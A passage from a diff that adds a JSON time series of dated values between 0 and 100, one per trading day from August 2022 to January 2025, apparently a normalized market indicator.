"2022-08-23", + 47.342033624527616 + ], + [ + "2022-08-24", + 35.6955025839495 + ], + [ + "2022-08-25", + 37.259491481542106 + ], + [ + "2022-08-26", + 47.24043345433754 + ], + [ + "2022-08-29", + 47.76779368283193 + ], + [ + "2022-08-30", + 48.34373366084691 + ], + [ + "2022-08-31", + 42.15040461491502 + ], + [ + "2022-09-01", + 41.72504366252311 + ], + [ + "2022-09-02", + 42.3299990719021 + ], + [ + "2022-09-06", + 42.400929820571385 + ], + [ + "2022-09-07", + 45.94002488779266 + ], + [ + "2022-09-08", + 39.47298805247826 + ], + [ + "2022-09-09", + 43.97288996077731 + ], + [ + "2022-09-12", + 42.17108351040057 + ], + [ + "2022-09-13", + 58.00049750849258 + ], + [ + "2022-09-14", + 59.001521166661476 + ], + [ + "2022-09-15", + 59.52115159872054 + ], + [ + "2022-09-16", + 58.73387594819888 + ], + [ + "2022-09-19", + 58.71909128490971 + ], + [ + "2022-09-20", + 55.912955443654475 + ], + [ + "2022-09-21", + 57.013276138648905 + ], + [ + "2022-09-22", + 56.92713102775054 + ], + [ + "2022-09-23", + 53.83152578119152 + ], + [ + "2022-09-26", + 46.04778748475541 + ], + [ + "2022-09-27", + 46.10251618115244 + ], + [ + "2022-09-28", + 49.69034573770341 + ], + [ + "2022-09-29", + 53.474854896343615 + ], + [ + "2022-09-30", + 54.27092386952651 + ], + [ + "2022-10-03", + 58.50956105840231 + ], + [ + "2022-10-04", + 64.99542949192555 + ], + [ + "2022-10-05", + 62.27429182525373 + ], + [ + "2022-10-06", + 62.018395028110575 + ], + [ + "2022-10-07", + 64.4154949951402 + ], + [ + "2022-10-10", + 62.38833249820148 + ], + [ + "2022-10-11", + 47.92153825780433 + ], + [ + "2022-10-12", + 46.891105430504986 + ], + [ + "2022-10-13", + 50.95054733737855 + ], + [ + "2022-10-14", + 55.148771685805606 + ], + [ + "2022-10-17", + 62.59321528882622 + ], + [ + "2022-10-18", + 63.26571294330912 + ], + [ + "2022-10-19", + 61.86166039366374 + ], + [ + "2022-10-20", + 61.324664439426314 + ], + [ + "2022-10-21", + 63.52796435809452 + ], + [ + "2022-10-24", + 64.07108216230267 + ], + [ + "2022-10-25", + 66.04698339496964 + ], + [ + "2022-10-26", + 66.97725978020961 + ], + [ + "2022-10-27", + 64.44017951176217 + ], + [ + "2022-10-28", + 67.06662115450328 + ], + [ + "2022-10-31", + 65.49683441445757 + ], + [ + "2022-11-01", + 60.503381194431796 + ], + [ + "2022-11-02", + 66.49193824335612 + ], + [ + "2022-11-03", + 67.75627306280504 + ], + [ + "2022-11-04", + 62.27036413171512 + ], + [ + "2022-11-07", + 62.35618694812444 + ], + [ + "2022-11-08", + 60.93774328713859 + ], + [ + "2022-11-09", + 64.04055116710079 + ], + [ + "2022-11-10", + 87.94334774688447 + ], + [ + "2022-11-11", + 83.61448212518134 + ], + [ + "2022-11-14", + 80.428420333453 + ], + [ + "2022-11-15", + 80.81641772842774 + ], + [ + "2022-11-16", + 81.90580301003236 + ], + [ + "2022-11-17", + 81.69817331215286 + ], + [ + "2022-11-18", + 79.53032342169007 + ], + [ + "2022-11-21", + 79.02469609939055 + ], + [ + "2022-11-22", + 77.81736664424591 + ], + [ + "2022-11-23", + 75.38655797940906 + ], + [ + "2022-11-25", + 72.1843841865771 + ], + [ + "2022-11-28", + 67.23700100430588 + ], + [ + "2022-11-29", + 65.64194509831188 + ], + [ + "2022-11-30", + 75.27875147705087 + ], + [ + "2022-12-01", + 65.92198272998117 + ], + [ + "2022-12-02", + 62.177440229764 + ], + [ + "2022-12-05", + 64.23752692864572 + ], + [ + "2022-12-06", + 63.794553073849094 + ], + [ + "2022-12-07", + 63.92242029709556 + ], + [ + "2022-12-08", + 59.38481526075977 + ], + [ + "2022-12-09", + 14.161653579637232 + ], + [ + "2022-12-12", + 11.738357554989008 + ], + [ + "2022-12-13", + 12.0872824630619 + ], + [ + "2022-12-14", + 10.73013022593958 + ], + [ + "2022-12-15", + 20.206838677869086 + ], + [ + "2022-12-16", + 20.88575231157249 + ], + [ + "2022-12-19", + 22.227879244404374 + ], + [ + "2022-12-20", + 21.625641353429618 + ], + [ + "2022-12-21", + 21.783912818336454 + ], + [ + "2022-12-22", + 24.4477300486201 + ], + [ + "2022-12-23", + 24.547915507225706 + ], + [ + "2022-12-27", + 24.445522821979736 + ], + [ + "2022-12-28", + 25.232535046640407 + ], + [ + "2022-12-29", + 7.589799657524171 + ], + [ + "2022-12-30", + 7.341315817261705 + ], + [ + "2023-01-03", + 7.410952152056128 + ], + [ + "2023-01-04", + 6.684214664990296 + ], + [ + "2023-01-05", + 4.761601728470367 + ], + [ + "2023-01-06", + 14.47254760070797 + ], + [ + "2023-01-09", + 13.220323436591782 + ], + [ + "2023-01-10", + 14.314641665208717 + ], + [ + "2023-01-11", + 15.864046184608641 + ], + [ + "2023-01-12", + 14.779396760026378 + ], + [ + "2023-01-13", + 14.9784717665985 + ], + [ + "2023-01-17", + 2.270991068233431 + ], + [ + "2023-01-18", + 2.9506499296854893 + ], + [ + "2023-01-19", + 1.8588850798669831 + ], + [ + "2023-01-20", + 9.70054235505967 + ], + [ + "2023-01-23", + 12.367544412367296 + ], + [ + "2023-01-24", + 4.169551687959771 + ], + [ + "2023-01-25", + 4.541583491829412 + ], + [ + "2023-01-26", + 2.977181955553899 + ], + [ + "2023-01-27", + 0.0 + ], + [ + "2023-01-30", + 3.925526532282138 + ], + [ + "2023-01-31", + 4.9654248685026365 + ], + [ + "2023-02-01", + 5.885934070644213 + ], + [ + "2023-02-02", + 14.413454741783946 + ], + [ + "2023-02-03", + 15.210526642190558 + ], + [ + "2023-02-06", + 13.812861321751793 + ], + [ + "2023-02-07", + 16.0212372658171 + ], + [ + "2023-02-08", + 22.012259446913557 + ], + [ + "2023-02-09", + 22.51872174293882 + ], + [ + "2023-02-10", + 23.662123526355852 + ], + [ + "2023-02-13", + 25.027644023217277 + ], + [ + "2023-02-14", + 25.06657836305619 + ], + [ + "2023-02-15", + 22.177573985274233 + ], + [ + "2023-02-16", + 25.601943702709217 + ], + [ + "2023-02-17", + 21.42108781783154 + ], + [ + "2023-02-21", + 23.96067882954265 + ], + [ + "2023-02-22", + 23.87936922150919 + ], + [ + "2023-02-23", + 24.245490154808607 + ], + [ + "2023-02-24", + 23.815716666763553 + ], + [ + "2023-02-27", + 23.402082455182615 + ], + [ + "2023-02-28", + 19.297320403814894 + ], + [ + "2023-03-01", + 17.618886447949723 + ], + [ + "2023-03-02", + 12.971472312156795 + ], + [ + "2023-03-03", + 3.3233507523969212 + ], + [ + "2023-03-06", + 0.3273934390313992 + ], + [ + "2023-03-07", + 1.270389999701703 + ], + [ + "2023-03-08", + 0.0 + ], + [ + "2023-03-09", + 0.0 + ], + [ + "2023-03-10", + 1.15490154346394 + ], + [ + "2023-03-13", + 1.923258392159701 + ], + [ + "2023-03-14", + 5.463301797130818 + ], + [ + "2023-03-15", + 5.033475419315504 + ], + [ + "2023-03-16", + 12.94131819859024 + ], + [ + "2023-03-17", + 9.10122266450705 + ], + [ + "2023-03-20", + 8.507067245943725 + ], + [ + "2023-03-21", + 2.637422386198326 + ], + [ + "2023-03-22", + 5.739442515963097 + ], + [ + "2023-03-23", + 6.430402298142949 + ], + [ + "2023-03-24", + 1.6919023652324627 + ], + [ + "2023-03-27", + 2.638464522534256 + ], + [ + "2023-03-28", + 3.223950405281606 + ], + [ + "2023-03-29", + 4.612932753124611 + ], + [ + "2023-03-30", + 4.733446689343432 + ], + [ + "2023-03-31", + 3.25132840788075 + ], + [ + "2023-04-03", + 3.6132603357463675 + ], + [ + "2023-04-04", + 0.9714231323772227 + ], + [ + "2023-04-05", + 3.4531704819680096 + ], + [ + "2023-04-06", + 0.0 + ], + [ + "2023-04-10", + 0.0 + ], + [ + "2023-04-11", + 1.496678296514376 + ], + [ + "2023-04-12", + 0.0 + ], + [ + "2023-04-13", + 3.444533798407817 + ], + [ + "2023-04-14", + 0.0 + ], + [ + "2023-04-17", + 0.0 + ], + [ + "2023-04-18", + 0.014210581690326022 + ], + [ + "2023-04-19", + 0.0 + ], + [ + "2023-04-20", + 0.0 + ], + [ + "2023-04-21", + 0.0 + ], + [ + "2023-04-24", + 0.017102474842721094 + ], + [ + "2023-04-25", + 4.557653602900262 + ], + [ + "2023-04-26", + 4.454132675594466 + ], + [ + "2023-04-27", + 9.380906007506363 + ], + [ + "2023-04-28", + 8.989638889816815 + ], + [ + "2023-05-01", + 5.790027827826976 + ], + [ + "2023-05-02", + 6.742201683802559 + ], + [ + "2023-05-03", + 7.132100341776897 + ], + [ + "2023-05-04", + 5.85802890606971 + ], + [ + "2023-05-05", + 10.498204428447808 + ], + [ + "2023-05-08", + 10.521236620001126 + ], + [ + "2023-05-09", + 10.519750804095251 + ], + [ + "2023-05-10", + 10.364049565076309 + ], + [ + "2023-05-11", + 6.395649484082486 + ], + [ + "2023-05-12", + 6.539574687514005 + ], + [ + "2023-05-15", + 6.753628689526682 + ], + [ + "2023-05-16", + 6.742909640344495 + ], + [ + "2023-05-17", + 8.08947839480557 + ], + [ + "2023-05-18", + 9.774044205842916 + ], + [ + "2023-05-19", + 10.122506457866022 + ], + [ + "2023-05-22", + 9.912739092922724 + ], + [ + "2023-05-23", + 6.95283971834362 + ], + [ + "2023-05-24", + 8.061479652545136 + ], + [ + "2023-05-25", + 6.302530646568997 + ], + [ + "2023-05-26", + 12.75970064437958 + ], + [ + "2023-05-30", + 12.796421485790843 + ], + [ + "2023-05-31", + 12.297101975521262 + ], + [ + "2023-06-01", + 11.365166527970661 + ], + [ + "2023-06-02", + 10.521190784148152 + ], + [ + "2023-06-05", + 7.503119856384815 + ], + [ + "2023-06-06", + 7.8190863195762805 + ], + [ + "2023-06-07", + 12.697356009557073 + ], + [ + "2023-06-08", + 12.831692129714185 + ], + [ + "2023-06-09", + 12.809847269340494 + ], + [ + "2023-06-12", + 14.057421211757697 + ], + [ + "2023-06-13", + 14.129645812452956 + ], + [ + "2023-06-14", + 13.943370359761984 + ], + [ + "2023-06-15", + 13.898507298662619 + ], + [ + "2023-06-16", + 13.313415607329945 + ], + [ + "2023-06-20", + 13.199398434886595 + ], + [ + "2023-06-21", + 17.183021583928713 + ], + [ + "2023-06-22", + 14.009206319029238 + ], + [ + "2023-06-23", + 15.482603992431255 + ], + [ + "2023-06-26", + 13.522475390476094 + ], + [ + "2023-06-27", + 8.916027034675741 + ], + [ + "2023-06-28", + 8.815865817709343 + ], + [ + "2023-06-29", + 7.9255540562338815 + ], + [ + "2023-06-30", + 8.918497516830035 + ], + [ + "2023-07-03", + 8.508590574036909 + ], + [ + "2023-07-05", + 8.561866112016226 + ], + [ + "2023-07-06", + 9.879171533517003 + ], + [ + "2023-07-07", + 4.819081517134434 + ], + [ + "2023-07-10", + 3.470422704712164 + ], + [ + "2023-07-11", + 3.529784860205581 + ], + [ + "2023-07-12", + 1.5270362600392382 + ], + [ + "2023-07-13", + 4.582688281513108 + ], + [ + "2023-07-14", + 4.222073591978761 + ], + [ + "2023-07-17", + 3.5215201883459315 + ], + [ + "2023-07-18", + 2.9743428505941254 + ], + [ + "2023-07-19", + 2.8046679118722047 + ], + [ + "2023-07-20", + 9.203000634484788 + ], + [ + "2023-07-21", + 8.1468143142374 + ], + [ + "2023-07-24", + 6.186025993551838 + ], + [ + "2023-07-25", + 2.7032861077488968 + ], + [ + "2023-07-26", + 0.0 + ], + [ + "2023-07-27", + 0.3426287112774597 + ], + [ + "2023-07-28", + 4.314987380461352 + ], + [ + "2023-07-31", + 1.6164697592284127 + ], + [ + "2023-08-01", + 1.9129543549501848 + ], + [ + "2023-08-02", + 9.996366120339093 + ], + [ + "2023-08-03", + 9.081391312228385 + ], + [ + "2023-08-04", + 9.254445485971194 + ], + [ + "2023-08-07", + 10.04741312291145 + ], + [ + "2023-08-08", + 11.058823952504492 + ], + [ + "2023-08-09", + 10.524636264605563 + ], + [ + "2023-08-10", + 5.91247187797804 + ], + [ + "2023-08-11", + 6.2739010089533656 + ], + [ + "2023-08-14", + 6.954353839232735 + ], + [ + "2023-08-15", + 6.3618457830893425 + ], + [ + "2023-08-16", + 7.24858146857066 + ], + [ + "2023-08-17", + 1.6492369950578782 + ], + [ + "2023-08-18", + 1.6641513532361338 + ], + [ + "2023-08-21", + 6.836869931915516 + ], + [ + "2023-08-22", + 5.671869638565259 + ], + [ + "2023-08-23", + 10.202733140409064 + ], + [ + "2023-08-24", + 15.864616335591574 + ], + [ + "2023-08-25", + 11.5793673262742 + ], + [ + "2023-08-28", + 12.83562985204632 + ], + [ + "2023-08-29", + 19.82022883274666 + ], + [ + "2023-08-30", + 14.374303041276423 + ], + [ + "2023-08-31", + 14.372087432496155 + ], + [ + "2023-09-01", + 14.04650737723092 + ], + [ + "2023-09-05", + 13.21042147167418 + ], + [ + "2023-09-06", + 13.276140327414899 + ], + [ + "2023-09-07", + 12.252834612034478 + ], + [ + "2023-09-08", + 12.240910975496751 + ], + [ + "2023-09-11", + 12.97833156463911 + ], + [ + "2023-09-12", + 13.321705772885418 + ], + [ + "2023-09-13", + 11.792299052803987 + ], + [ + "2023-09-14", + 10.162742581056952 + ], + [ + "2023-09-15", + 12.798668932861974 + ], + [ + "2023-09-18", + 12.668928274075322 + ], + [ + "2023-09-19", + 9.650794605527377 + ], + [ + "2023-09-20", + 12.768137882066766 + ], + [ + "2023-09-21", + 13.629935036894592 + ], + [ + "2023-09-22", + 7.345798507396123 + ], + [ + "2023-09-25", + 6.624985546989477 + ], + [ + "2023-09-26", + 8.305574065354433 + ], + [ + "2023-09-27", + 0.0 + ], + [ + "2023-09-28", + 0.8260919893700847 + ], + [ + "2023-09-29", + 0.47039396417399026 + ], + [ + "2023-10-02", + 2.3011855175425597 + ], + [ + "2023-10-03", + 5.682928914326586 + ], + [ + "2023-10-04", + 9.084148494776462 + ], + [ + "2023-10-05", + 8.706079161054934 + ], + [ + "2023-10-06", + 13.409260638829624 + ], + [ + "2023-10-09", + 11.711535553293807 + ], + [ + "2023-10-10", + 10.98781070668963 + ], + [ + "2023-10-11", + 11.610277341031685 + ], + [ + "2023-10-12", + 10.708133056073683 + ], + [ + "2023-10-13", + 8.871532270281545 + ], + [ + "2023-10-16", + 10.86974118071937 + ], + [ + "2023-10-17", + 10.947573189643116 + ], + [ + "2023-10-18", + 10.805640710170417 + ], + [ + "2023-10-19", + 6.637907346198264 + ], + [ + "2023-10-20", + 9.937656250319996 + ], + [ + "2023-10-23", + 9.754474170407999 + ], + [ + "2023-10-24", + 7.814230773728317 + ], + [ + "2023-10-25", + 16.101858310404747 + ], + [ + "2023-10-26", + 19.11623163218644 + ], + [ + "2023-10-27", + 19.600282384417728 + ], + [ + "2023-10-30", + 20.387339476096923 + ], + [ + "2023-10-31", + 17.435891544968126 + ], + [ + "2023-11-01", + 18.939536484582785 + ], + [ + "2023-11-02", + 22.639568595142414 + ], + [ + "2023-11-03", + 20.944345826047755 + ], + [ + "2023-11-06", + 20.834312060472662 + ], + [ + "2023-11-07", + 21.516869727406345 + ], + [ + "2023-11-08", + 20.950067397166723 + ], + [ + "2023-11-09", + 21.538186515197154 + ], + [ + "2023-11-10", + 24.88301152069702 + ], + [ + "2023-11-13", + 25.35256277715468 + ], + [ + "2023-11-14", + 30.367203822833254 + ], + [ + "2023-11-15", + 26.955014029956732 + ], + [ + "2023-11-16", + 25.17513819734809 + ], + [ + "2023-11-17", + 20.678323244710004 + ], + [ + "2023-11-20", + 21.97048501138922 + ], + [ + "2023-11-21", + 23.062856594994948 + ], + [ + "2023-11-22", + 10.488605966920861 + ], + [ + "2023-11-24", + 0.2276638630091653 + ], + [ + "2023-11-27", + 1.134464484082782 + ], + [ + "2023-11-28", + 0.8084896347055078 + ], + [ + "2023-11-29", + 1.6095073621522844 + ], + [ + "2023-11-30", + 0.0 + ], + [ + "2023-12-01", + 0.0 + ], + [ + "2023-12-04", + 1.5914384411951878 + ], + [ + "2023-12-05", + 1.5434369956140737 + ], + [ + "2023-12-06", + 1.6476871823414008 + ], + [ + "2023-12-07", + 4.641097806995074 + ], + [ + "2023-12-08", + 2.602964600192835 + ], + [ + "2023-12-11", + 0.0 + ], + [ + "2023-12-12", + 0.12668343331064758 + ], + [ + "2023-12-13", + 0.0 + ], + [ + "2023-12-14", + 0.22322378052965186 + ], + [ + "2023-12-15", + 0.24236785016640705 + ], + [ + "2023-12-18", + 0.8462188205513406 + ], + [ + "2023-12-19", + 0.0 + ], + [ + "2023-12-20", + 8.066725716189628 + ], + [ + "2023-12-21", + 10.716430184613221 + ], + [ + "2023-12-22", + 10.237635136567556 + ], + [ + "2023-12-26", + 10.259423893509307 + ], + [ + "2023-12-27", + 10.286864110201366 + ], + [ + "2023-12-28", + 10.198676499574715 + ], + [ + "2023-12-29", + 11.078407633298944 + ], + [ + "2024-01-02", + 22.12645441390438 + ], + [ + "2024-01-03", + 22.900462407016757 + ], + [ + "2024-01-04", + 24.20335928289685 + ], + [ + "2024-01-05", + 22.736498939659768 + ], + [ + "2024-01-08", + 27.899599276407777 + ], + [ + "2024-01-09", + 27.771153505157535 + ], + [ + "2024-01-10", + 27.17910400695258 + ], + [ + "2024-01-11", + 26.00345204803851 + ], + [ + "2024-01-12", + 22.808838918993835 + ], + [ + "2024-01-16", + 22.787220657641498 + ], + [ + "2024-01-17", + 23.546179067285916 + ], + [ + "2024-01-18", + 27.625310819936544 + ], + [ + "2024-01-19", + 35.71445621948261 + ], + [ + "2024-01-22", + 28.822629703605564 + ], + [ + "2024-01-23", + 26.728248647269133 + ], + [ + "2024-01-24", + 27.066590388075767 + ], + [ + "2024-01-25", + 26.607145136981103 + ], + [ + "2024-01-26", + 28.176385318937275 + ], + [ + "2024-01-29", + 29.78164707201084 + ], + [ + "2024-01-30", + 30.571925766554074 + ], + [ + "2024-01-31", + 33.30836384640443 + ], + [ + "2024-02-01", + 31.46350926544172 + ], + [ + "2024-02-02", + 34.01735492267475 + ], + [ + "2024-02-05", + 34.59665588241189 + ], + [ + "2024-02-06", + 27.97007635615411 + ], + [ + "2024-02-07", + 29.298843158402033 + ], + [ + "2024-02-08", + 28.998046591814436 + ], + [ + "2024-02-09", + 30.167115858214395 + ], + [ + "2024-02-12", + 31.23568425014539 + ], + [ + "2024-02-13", + 39.24326132370617 + ], + [ + "2024-02-14", + 39.11733085225361 + ], + [ + "2024-02-15", + 35.91780000333984 + ], + [ + "2024-02-16", + 31.16678885099271 + ], + [ + "2024-02-20", + 33.628528430861984 + ], + [ + "2024-02-21", + 33.80575522917447 + ], + [ + "2024-02-22", + 51.589922629768914 + ], + [ + "2024-02-23", + 51.96943230388621 + ], + [ + "2024-02-26", + 51.19584562711508 + ], + [ + "2024-02-27", + 49.90768349639432 + ], + [ + "2024-02-28", + 52.723247300866824 + ], + [ + "2024-02-29", + 43.6389825349284 + ], + [ + "2024-03-01", + 49.396131481066405 + ], + [ + "2024-03-04", + 47.92527748312534 + ], + [ + "2024-03-05", + 58.71109401901761 + ], + [ + "2024-03-06", + 59.2503205753865 + ], + [ + "2024-03-07", + 62.38948806581498 + ], + [ + "2024-03-08", + 69.15157568649626 + ], + [ + "2024-03-11", + 67.15309619307486 + ], + [ + "2024-03-12", + 71.77263519748962 + ], + [ + "2024-03-13", + 66.19546999492185 + ], + [ + "2024-03-14", + 63.951843053763405 + ], + [ + "2024-03-15", + 68.01295812322543 + ], + [ + "2024-03-18", + 73.46978523243894 + ], + [ + "2024-03-19", + 71.98598439922431 + ], + [ + "2024-03-20", + 74.08811309360918 + ], + [ + "2024-03-21", + 49.975374097682206 + ], + [ + "2024-03-22", + 49.41568080733613 + ], + [ + "2024-03-25", + 50.02055474098548 + ], + [ + "2024-03-26", + 50.485649639882205 + ], + [ + "2024-03-27", + 49.2705811651111 + ], + [ + "2024-03-28", + 47.67306218579215 + ], + [ + "2024-04-01", + 39.26103593936372 + ], + [ + "2024-04-02", + 41.619935246917116 + ], + [ + "2024-04-03", + 28.859191978409278 + ], + [ + "2024-04-04", + 37.51248132867621 + ], + [ + "2024-04-05", + 34.084520628266695 + ], + [ + "2024-04-08", + 25.44381825659332 + ], + [ + "2024-04-09", + 25.117709672288196 + ], + [ + "2024-04-10", + 19.314968682588024 + ], + [ + "2024-04-11", + 27.780015883178915 + ], + [ + "2024-04-12", + 38.26315724524997 + ], + [ + "2024-04-15", + 43.22141463530379 + ], + [ + "2024-04-16", + 39.39882187383222 + ], + [ + "2024-04-17", + 43.63878052832651 + ], + [ + "2024-04-18", + 36.82330093293717 + ], + [ + "2024-04-19", + 46.42169893505347 + ], + [ + "2024-04-22", + 52.032204926178785 + ], + [ + "2024-04-23", + 62.55044179030688 + ], + [ + "2024-04-24", + 63.49212197005415 + ], + [ + "2024-04-25", + 62.92629903182736 + ], + [ + "2024-04-26", + 72.35025954339524 + ], + [ + "2024-04-29", + 72.88156816508177 + ], + [ + "2024-04-30", + 80.19672936071103 + ], + [ + "2024-05-01", + 80.33262761993304 + ], + [ + "2024-05-02", + 80.48432532718557 + ], + [ + "2024-05-03", + 88.08787220447802 + ], + [ + "2024-05-06", + 91.56985162084689 + ], + [ + "2024-05-07", + 91.2079126336656 + ], + [ + "2024-05-08", + 89.18736038192743 + ], + [ + "2024-05-09", + 82.25405434078019 + ], + [ + "2024-05-10", + 75.01108762872776 + ], + [ + "2024-05-13", + 65.6229753316076 + ], + [ + "2024-05-14", + 66.28943185866139 + ], + [ + "2024-05-15", + 64.94463225605051 + ], + [ + "2024-05-16", + 63.1741416021542 + ], + [ + "2024-05-17", + 43.34179403287491 + ], + [ + "2024-05-20", + 42.45096572053261 + ], + [ + "2024-05-21", + 37.79819481946783 + ], + [ + "2024-05-22", + 38.2719612861166 + ], + [ + "2024-05-23", + 38.02500538339364 + ], + [ + "2024-05-24", + 33.586985261650184 + ], + [ + "2024-05-28", + 33.56058218940265 + ], + [ + "2024-05-29", + 16.260445598619057 + ], + [ + "2024-05-30", + 20.35294382885414 + ], + [ + "2024-05-31", + 16.789957404050288 + ], + [ + "2024-06-03", + 0.6526735527943781 + ], + [ + "2024-06-04", + 0.0 + ], + [ + "2024-06-05", + 17.18155266148326 + ], + [ + "2024-06-06", + 17.11697024764851 + ], + [ + "2024-06-07", + 17.717650964911826 + ], + [ + "2024-06-10", + 17.785719650285746 + ], + [ + "2024-06-11", + 18.6930095561957 + ], + [ + "2024-06-12", + 23.058696838971684 + ], + [ + "2024-06-13", + 15.927290475491615 + ], + [ + "2024-06-14", + 15.121361055918317 + ], + [ + "2024-06-17", + 18.27495784185624 + ], + [ + "2024-06-18", + 18.099231447103904 + ], + [ + "2024-06-20", + 23.253443855168054 + ], + [ + "2024-06-21", + 24.30434278016368 + ], + [ + "2024-06-24", + 29.93531675708576 + ], + [ + "2024-06-25", + 31.126060720694497 + ], + [ + "2024-06-26", + 31.04329393187013 + ], + [ + "2024-06-27", + 27.388325107668017 + ], + [ + "2024-06-28", + 22.250850784416407 + ], + [ + "2024-07-01", + 21.988110016351882 + ], + [ + "2024-07-02", + 24.075875274651278 + ], + [ + "2024-07-03", + 24.902307541143184 + ], + [ + "2024-07-05", + 14.221842730117965 + ], + [ + "2024-07-08", + 13.585450480995394 + ], + [ + "2024-07-09", + 12.85162537351937 + ], + [ + "2024-07-10", + 15.069684562114046 + ], + [ + "2024-07-11", + 41.060446537239116 + ], + [ + "2024-07-12", + 36.93501188261868 + ], + [ + "2024-07-15", + 36.514415406933374 + ], + [ + "2024-07-16", + 36.255987538286746 + ], + [ + "2024-07-17", + 62.946456312730604 + ], + [ + "2024-07-18", + 63.56249979775947 + ], + [ + "2024-07-19", + 64.13851886688097 + ], + [ + "2024-07-22", + 70.52310662570818 + ], + [ + "2024-07-23", + 66.90834894877516 + ], + [ + "2024-07-24", + 97.34693141487472 + ], + [ + "2024-07-25", + 98.91969078086872 + ], + [ + "2024-07-26", + 100.0 + ], + [ + "2024-07-29", + 100.0 + ], + [ + "2024-07-30", + 100.0 + ], + [ + "2024-07-31", + 100.0 + ], + [ + "2024-08-01", + 100.0 + ], + [ + "2024-08-02", + 100.0 + ], + [ + "2024-08-05", + 100.0 + ], + [ + "2024-08-06", + 100.0 + ], + [ + "2024-08-07", + 96.26796889049278 + ], + [ + "2024-08-08", + 100.0 + ], + [ + "2024-08-09", + 99.80897294409846 + ], + [ + "2024-08-12", + 99.77491682113953 + ], + [ + "2024-08-13", + 100.0 + ], + [ + "2024-08-14", + 93.07887808650372 + ], + [ + "2024-08-15", + 99.88893186213042 + ], + [ + "2024-08-16", + 99.15320023621447 + ], + [ + "2024-08-19", + 98.71271324510164 + ], + [ + "2024-08-20", + 98.62955285294426 + ], + [ + "2024-08-21", + 84.64443733351906 + ], + [ + "2024-08-22", + 86.28898395544239 + ], + [ + "2024-08-23", + 86.4571556658527 + ], + [ + "2024-08-26", + 87.81859983799058 + ], + [ + "2024-08-27", + 85.34364444732057 + ], + [ + "2024-08-28", + 78.17544418217012 + ], + [ + "2024-08-29", + 71.05927388026505 + ], + [ + "2024-08-30", + 63.37806385596338 + ], + [ + "2024-09-03", + 64.53826812778361 + ], + [ + "2024-09-04", + 64.47969888038402 + ], + [ + "2024-09-05", + 62.17839464592046 + ], + [ + "2024-09-06", + 61.68204664194899 + ], + [ + "2024-09-09", + 63.41324799258341 + ], + [ + "2024-09-10", + 64.30480722464777 + ], + [ + "2024-09-11", + 62.56061518690831 + ], + [ + "2024-09-12", + 63.64606755813952 + ], + [ + "2024-09-13", + 55.60003691430588 + ], + [ + "2024-09-16", + 55.84911107091403 + ], + [ + "2024-09-17", + 53.22989521572752 + ], + [ + "2024-09-18", + 53.380224420911794 + ], + [ + "2024-09-19", + 62.219518617172966 + ], + [ + "2024-09-20", + 58.67574093630966 + ], + [ + "2024-09-23", + 57.3455314576384 + ], + [ + "2024-09-24", + 56.04321271556648 + ], + [ + "2024-09-25", + 55.99547782348044 + ], + [ + "2024-09-26", + 54.14959658165205 + ], + [ + "2024-09-27", + 54.7816301311518 + ], + [ + "2024-09-30", + 53.379060887216255 + ], + [ + "2024-10-01", + 41.2550948450593 + ], + [ + "2024-10-02", + 40.85445377750429 + ], + [ + "2024-10-03", + 40.98043859691525 + ], + [ + "2024-10-04", + 25.522810995862212 + ], + [ + "2024-10-07", + 28.166462052183615 + ], + [ + "2024-10-08", + 30.035199655837673 + ], + [ + "2024-10-09", + 23.722125712757812 + ], + [ + "2024-10-10", + 22.73332936317967 + ], + [ + "2024-10-11", + 22.62454754781058 + ], + [ + "2024-10-14", + 22.57252258397594 + ], + [ + "2024-10-15", + 27.44702972961705 + ], + [ + "2024-10-16", + 26.745722359804187 + ], + [ + "2024-10-17", + 14.038584319317335 + ], + [ + "2024-10-18", + 14.404780619028015 + ], + [ + "2024-10-21", + 14.373291179103227 + ], + [ + "2024-10-22", + 14.038447262414827 + ], + [ + "2024-10-23", + 20.064020175282728 + ], + [ + "2024-10-24", + 20.351744979679438 + ], + [ + "2024-10-25", + 20.088728999201777 + ], + [ + "2024-10-28", + 20.009586377587375 + ], + [ + "2024-10-29", + 16.02866965340606 + ], + [ + "2024-10-30", + 17.944900120207222 + ], + [ + "2024-10-31", + 32.103434947851675 + ], + [ + "2024-11-01", + 30.44009233285819 + ], + [ + "2024-11-04", + 28.242345246489293 + ], + [ + "2024-11-05", + 27.28425305072793 + ], + [ + "2024-11-06", + 39.17271391805558 + ], + [ + "2024-11-07", + 42.354527455989135 + ], + [ + "2024-11-08", + 42.35632679990089 + ], + [ + "2024-11-11", + 41.6916184901623 + ], + [ + "2024-11-12", + 38.028932123485895 + ], + [ + "2024-11-13", + 38.15773679805646 + ], + [ + "2024-11-14", + 39.50798023846966 + ], + [ + "2024-11-15", + 49.17132438649422 + ], + [ + "2024-11-18", + 49.770047855739584 + ], + [ + "2024-11-19", + 50.3398101580685 + ], + [ + "2024-11-20", + 46.19947587608579 + ], + [ + "2024-11-21", + 45.564653349113385 + ], + [ + "2024-11-22", + 45.236414420471036 + ], + [ + "2024-11-25", + 45.2333950579764 + ], + [ + "2024-11-26", + 44.41982173306765 + ], + [ + "2024-11-27", + 44.59705461629715 + ], + [ + "2024-11-29", + 32.826956023857555 + ], + [ + "2024-12-02", + 33.70103477736335 + ], + [ + "2024-12-03", + 33.051401574112035 + ], + [ + "2024-12-04", + 32.87998794474996 + ], + [ + "2024-12-05", + 20.865630525573025 + ], + [ + "2024-12-06", + 17.394669100548 + ], + [ + "2024-12-09", + 19.145911885504088 + ], + [ + "2024-12-10", + 19.51953405486642 + ], + [ + "2024-12-11", + 25.45560035755993 + ], + [ + "2024-12-12", + 26.6005010746914 + ], + [ + "2024-12-13", + 25.694107240872732 + ], + [ + "2024-12-16", + 11.959111933557653 + ], + [ + "2024-12-17", + 13.385964103008233 + ], + [ + "2024-12-18", + 42.31139603584829 + ], + [ + "2024-12-19", + 42.82950880439807 + ], + [ + "2024-12-20", + 43.67869487364228 + ], + [ + "2024-12-23", + 44.667738344717 + ], + [ + "2024-12-24", + 46.68965387376715 + ], + [ + "2024-12-26", + 46.66482297255193 + ], + [ + "2024-12-27", + 48.81612901840538 + ], + [ + "2024-12-30", + 51.17266807723772 + ], + [ + "2024-12-31", + 50.61912549261367 + ], + [ + "2025-01-02", + 50.474999857022006 + ], + [ + "2025-01-03", + 52.133962418220904 + ], + [ + "2025-01-06", + 53.958525431511205 + ], + [ + "2025-01-07", + 57.18441706260946 + ], + [ + "2025-01-08", + 56.532495619075654 + ], + [ + "2025-01-10", + 59.525924925664974 + ], + [ + "2025-01-13", + 54.14097930695099 + ], + [ + "2025-01-14", + 53.87874477214758 + ], + [ + "2025-01-15", + 60.983160808536006 + ], + [ + "2025-01-16", + 57.651192108386816 + ], + [ + 